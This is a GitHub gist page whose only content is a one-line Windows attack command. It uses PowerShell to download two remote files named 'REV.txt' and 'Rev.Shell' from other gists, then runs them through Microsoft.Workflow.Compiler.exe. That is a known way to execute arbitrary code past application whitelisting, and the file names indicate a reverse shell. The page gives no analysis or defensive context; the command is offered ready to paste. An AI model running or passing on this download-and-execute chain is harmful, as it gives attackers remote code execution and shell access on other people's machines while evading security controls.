Skip to content

Instantly share code, notes, and snippets.

@therealdreg
Created September 28, 2019 14:04
Show Gist options
  • Save therealdreg/2c99090da05746dddabfe0bdd5f403e8 to your computer and use it in GitHub Desktop.
Save therealdreg/2c99090da05746dddabfe0bdd5f403e8 to your computer and use it in GitHub Desktop.
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/David-Reguera-Garcia-Dreg/607bc274f9421ad267c563d115e70d09/raw/c41bc76b0b14c6d11dd66f4a4e08f29a590dc506/gistfile1.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/David-Reguera-Garcia-Dreg/cc4cf10c599dad542527203cbc3e8b44/raw/f109bfe2e2fadc0d8ea6618b2ca1d38fb5e396db/gistfile1.txt', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment